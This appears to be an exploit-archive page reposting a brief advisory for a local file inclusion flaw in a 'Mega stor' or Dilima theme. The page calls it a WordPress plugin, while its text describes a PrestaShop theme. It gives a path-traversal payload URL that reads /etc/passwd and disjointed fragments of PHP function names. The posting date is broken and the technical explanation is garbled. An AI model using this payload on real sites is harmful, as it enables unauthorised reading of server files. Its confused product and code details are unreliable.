Home / exploits Wordpress Plugin Mega stor - Local File Inclusion
Posted on 30 November -0001
<HTML><HEAD><TITLE>Wordpress Plugin Mega stor - Local File Inclusion</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Exploit Title: Wordpress Plugin Mega stor - Local File Inclusion # Software Link: https://null24.net/themeforest-dilima-v1-0-mega-store-responsive-prestashop-theme/ # Date : April 16, 2016 # Tested : on windows 7 # Author : mohamed naji # Personal contact: facebook.com/moohamed.naji ============================================================== introduction: Dilima Prestashop theme is built to match with multipurpose store, especially oriented with fully responsive as it works on any device (includes laptop, tablet, smartphone etc). This theme will be a great solution for online digital store, gifts store, fashion store or shop kids clothing and baby clothes… =========================================================== vulnerability in function compilefile() : ⇑ $this->compilefile ($in, $out) // lessc.inc.php : ⇓ function checkedcompile($in, $out) : ⇓ function checkedcompile($in, $out) requires: : if(!is_file($out) || filemtime($in) > filemtime($out)) /wp-content/plugins/dilima/pic.php?url=../../../etc/passwd thnx to : Xanonymous - Ayoub - </BODY></HTML>
